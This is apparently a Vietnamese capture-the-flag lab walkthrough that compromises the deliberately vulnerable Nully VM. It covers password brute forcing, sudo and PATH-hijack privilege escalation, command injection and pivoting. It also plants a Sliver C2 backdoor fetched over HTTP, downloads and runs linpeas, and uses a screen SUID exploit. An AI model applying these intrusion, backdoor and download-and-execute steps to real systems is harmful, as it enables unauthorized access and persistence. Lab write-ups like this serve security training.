# Chuẩn bị
1. [ ] Máy tấn công Kali Linux
2. [ ] Down máy ảo tại [đây](https://drive.google.com/file/d/1uK5yGxdii7jZf4-UWzjIy6LgPzk1OcWU/view?usp=sharing)
3. [ ] Tải [Sliver](https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux) vào máy Kali để quản lý C2
4. [ ] Tải tool [này](https://github.com/haicenhacks/username-generator.git) về để tạo username thông qua tên
# Setup
1. [ ] Kiểm tra card mạng, địa chỉ IP máy Kali
Máy kali đang để NAT và có địa cỉ ip là **192.168.88.128**
2. [ ] Bật VMWare rồi chọn `File -> Open` để chạy máy ảo từ file `NullyCybersecurityCTF.zip` đã được tải về.
3. [ ] Sau khi cài xong thì phải setup lại IP cho cùng dải với IP máy kali linux
- Chỉnh card mạng cho máy ảo `Nully` là NAT
- Lúc khởi động máy ảo `Nully` đồng thời nhấn `Shift` để vào chế độ GNU (Nếu không được thì chọn reset rồi làm lại)
- Chọn `Advanced options ... -> Enter`
- Chọn `E` để chỉnh sửa rồi sửa "ro recover nomodeset" -> "rw init=/bin/bash"
- Nhấn `Ctrl + X` để lưu và load lại
- Sau khi load xong thì truy cập vào luôn máy ảo với acc root. Chạy lệnh `passwd` để đổi lại mật khẩu
- Sau đó chạy `exec /sbin/init` để khởi động lại hệ thống. Sau đó đăng nhập lại với tài khoản root và mật khẩu vừa đổi
- Sử dụng nội dung file `/etc/netplan/00-installer-config.yaml` để cấu hình card mạng. Trong trường hợp này tên card mạng đang bị sai nên chúng ta sửa “enp0s3” thành “ens33”
- Sau đó chạy lệnh `netplan apply` để tự động nhận IP.
- Chạy lệnh `ifconfig ens33`, nếu nhận IP cùng dải với máy Kali là Oke
# Tấn công
## Rà quét hệ thống
1. [ ] Scan tìm địa chỉ IP máy Nully
- Chạy lệnh `netdiscover -r 192.68.88.0/24 -i eth1`
- Loại bỏ .1, .2 là máy thật và gateway, .254 là mạng quảng bá nên địa chỉ máy cần cần tấn công là **192.168.88.129**
2. [ ] Scan cổng mở trên máy Nully
- Sử dụng Nmap để scan bằng lệnh `nmap -sC -sV -p- 192.168.88.129`
- Kết quả cho thấy hệ thống mở cổng: 80, 110, 2222, 8000 và 9000. Hệ thống có web nên cứ vào check web trước
- Theo thông báo, không được phép tấn công cổng 80, 8000, 9000. => Còn mỗi 110 (mail) và 2222 (ssh) để tấn công. Hệ thống có 3 máy chủ là Mail, Web và Database. Máy chủ mail mở ra ngoài nên tấn công máy chủ Mail trước
## Tấn công máy chủ Mail Server
1. [ ] Đăng nhập với thông tin đã cho ở web
- Sau khi sử dụng lệnh `LIST` thì thấy có 1 mail, thực hiện đọc bằng lệnh `RETR 1`
- Nội dung mail là người dùng có tên "Bob Smith" gửi thông báo về việc ông ấy quên mật khẩu và ông ấy chắc chắn mật khẩu ông ấy đơn giản => Brute force
2. [ ] Brute-force mật khẩu người dùng Bob Smith
- Sử dụng công cụ `username-generator` để tạo danh sách username từ tên "Bob Smith"
- Sử dụng `hydra` để brute-force mật khẩu với danh sách người dùng đã tạo được
- Phát hiện được tài khoản `bob / bobby1985`. Thực hiện ssh vào để kiểm tra
=> Kết quả SSH thành công
3. [ ] Leo root máy chủ
- Kiểm tra quyền mà người dùng hiện tại có thể dùng bằng lệnh `sudo -l`
- Nhận thấy người dùng `bob` có thể thực thi tệp tin tệp `check.sh` với quyền của người dùng `my2user` mà không cần mật khẩu. Ngoài ra tệp `check.sh` thuộc sở hữu của `bob` và có quyền chỉnh sửa nên có thể ghi thêm vào file => Ghi thêm `/bin/bash` vào đầu file rồi chạy với quyền của người dùng `my2user` thì sẽ mở 1 bash mới với quyền của `my2user`
- Leo qua tài khoản `my2user` thành công, tiếp tục check quyền bằng `sudo -l`
- Kết quả cho thấy có thể chạy lệnh `zip` với quyền root mà không cần mật khẩu. Ở trong lệnh `zip` có options `--unzip-command` có thể chạy lệnh hệ thống với quyền của người chạy song song với quá trình zip file => Ý tưởng vẫn chèn bash vào options trên để mở 1 bash mới với quyền root
- Leo `root` thành công
4. [ ] Gán backdoor vào máy chủ Mail Server
- Mở terminal mới để chạy `sliver`
- Mở port 9999 để lắng nghe shell từ máy chủ Mail server
- Thực hiện gen file backdoor
- Tạo file thành công tại `/home/kali/`. Mở 1 terminal mới, sử dụng python3 để mở http server với mục đích tải file về máy chủ mail server
- Thực hiện tải file ở máy chủ Mailserver và chạy nó
- Tạo backdoor thành công
## Scan mạng nội bộ
1. [ ] Truy cập vào shell thông qua backdoor
2. [ ] Cài công cụ `nc` để scan
3. [ ] Kiểm tra dải IP nội bộ
- Dải nội bộ là `172.17.0.0/16`
4. [ ] Copy script sau vào 1 file .sh rồi chạy scan
```bash
#!/bin/bash
# Kiểm tra xem Netcat đã được cài đặt chưa
if ! command -v nc &> /dev/null; then
echo "Netcat (nc) chưa được cài đặt. Vui lòng cài đặt trước khi chạy script."
exit 1
fi
# Đầu vào: Dải IP và dải cổng cần quét
read -p "Nhập dải IP cần quét (vd: 192.168.1.1-192.168.1.254): " ip_range
read -p "Nhập dải cổng (vd: 1-1000): " port_range
# Tách dải IP
start_ip=$(echo $ip_range | cut -d '-' -f 1)
end_ip=$(echo $ip_range | cut -d '-' -f 2)
# Tách dải cổng
start_port=$(echo $port_range | cut -d '-' -f 1)
end_port=$(echo $port_range | cut -d '-' -f 2)
# Kiểm tra đầu vào hợp lệ
if [[ -z "$start_ip" || -z "$end_ip" || -z "$start_port" || -z "$end_port" ]]; then
echo "Đầu vào không hợp lệ. Hãy nhập đầy đủ thông tin."
exit 1
fi
# Hàm chuyển đổi IP sang số nguyên
ip_to_int() {
local ip=$1
IFS=. read -r i1 i2 i3 i4 <<< "$ip"
echo $(( (i1 << 24) + (i2 << 16) + (i3 << 8) + i4 ))
}
# Hàm chuyển đổi số nguyên sang IP
int_to_ip() {
local int=$1
echo "$(( (int >> 24) & 255 )).$(( (int >> 16) & 255 )).$(( (int >> 8) & 255 )).$(( int & 255 ))"
}
# Chuyển đổi IP sang số
start_ip_int=$(ip_to_int $start_ip)
end_ip_int=$(ip_to_int $end_ip)
# Bắt đầu quét
echo "Bắt đầu quét dải IP từ $start_ip đến $end_ip và dải cổng từ $start_port đến $end_port..."
echo "---------------------------------------------"
for ip_int in $(seq $start_ip_int $end_ip_int); do
current_ip=$(int_to_ip $ip_int)
echo "Đang quét IP: $current_ip"
for port in $(seq $start_port $end_port); do
nc -zv -w 1 $current_ip $port 2>&1 | grep "succeeded" &
done
done
wait
echo "Hoàn thành quét."
```
- Dựa vào cổng mở có thể đoán .2 là portainer (ko tấn công), .3 (database), .5 (Web Server)
## Tấn công máy chủ Web Server
1. [ ] Port forwarding về local cho dễ attack
- Sau khi port ward thì port web đang tự về cổng 8080 trên local, kiểm tra trên trình duyệt
2. [ ] Scan tìm path ẩn
- Truy cập vào file `ping.php`
- Yêu cầu sử dụng tham số`host`
- Trang web có chức năng kiểm tra `ping` đến một địa chỉ đc điền ở host
3. [ ] Khai thác lỗ hổng web
- Trang web có lỗ hổng `Command Injection`
4. [ ] Gán backdoor để tiện sử dụng
- Vì máy kali không kết nối trực tiếp đến máy chủ Web được nên phải pivot qua máy Mailserver đã chiếm được. Đầu tiên mở cổng trên máy mailserver để pivot
- Với lệnh trên đã mở cổng 9898 để thực hiện pivot. Tạo backdoor để chạy trên máy Web Server với pivot qua cổng 9898 của máy Mailserver.
- Đẩy file vừa tạo lên máy mail server
- Vào máy mail server mở http server để có thể tải về từ máy Web server
- Thực hiện tải về máy web server thông qua lỗ hổng web
- Sau khi tải về thì cấp quyền và chạy
- Kết quả tạo backdoor thành công
5. [ ] Leo root
- Vào shell web server thông qua backdoor
- Thử check quyền với `sudo -l` nhưng không được
- Đọc tệp tin `/etc/passwd` để xem thông tin người dùng khác
- Có 2 người dùng có thể đăng nhập là `oliver` và `oscar`. Sử dụng lệnh `type` để tìm kiếm những tệp tin thuộc sở hữu của 2 người dùng này
- Nhận thấy người dùng có id 1000 là `oscar` sở hữu python nên có thể dùng script sau để mở shell mới với người dùng oscar:
```python
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
```
- Sau khi leo qua người dùng `oscar` thì tìm kiếm các tệp tin nhạy cảm
- Phát hiện được password -> Đăng nhập thử
- Người dùng oscar có chương trình current-date trả về thời gian hiện tại
- Nhận thấy chương trình có gọi hàm `date`. vì nó call đến date theo thứ tự trong $PATH nên ta đơn giản chỉ cần tạo prog date chứa /bin/bash là khi chạy current-date nó sẽ excute /bin/bash với quyền root và ta có thể leo lên root rồi.
- Leo `root` thành công
## Tấn công máy chủ Database
1. [ ] Mở cổng 21 nên đăng nhập qua ftp mà không cần mật khẩu
- Đăng nhập thành công, thử xem các file
- Tải các file trên kia về máy webserver
- Kéo về máy thật
2. [ ] Crack mật khẩu file zip
- Mở ra thì thấy file txt ko có gì hay và file zip bị khóa
- Sử dụng công cụ `zip2john` để lấy mật khẩu dạng mã hóa và sử dụng `john` để crack
- Crack được pass là `1234567890`, giải nén để đọc thông tin trong file zip
- Kết quả cho ra 1 file `creds.txt` và trong đó có tài khoản người dùng, thử login
- Đăng nhập thành công
3. [ ] Leo root
- thử mấy trò leo root như 2 máy đầu nhưng không đc nên sẽ tải `linpeas` để quét
```
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
```
- Dính khá nhiều CVE nhưng thầy bảo ko khai thác kernel nên bỏ qua
- Tìm được Unknown SUID binary của screen-4.5.0
- Search tìm được script exploit https://www.exploit-db.com/raw/41154
- Copy về chạy là lên root đc
Sign in with Wallet
Connect another wallet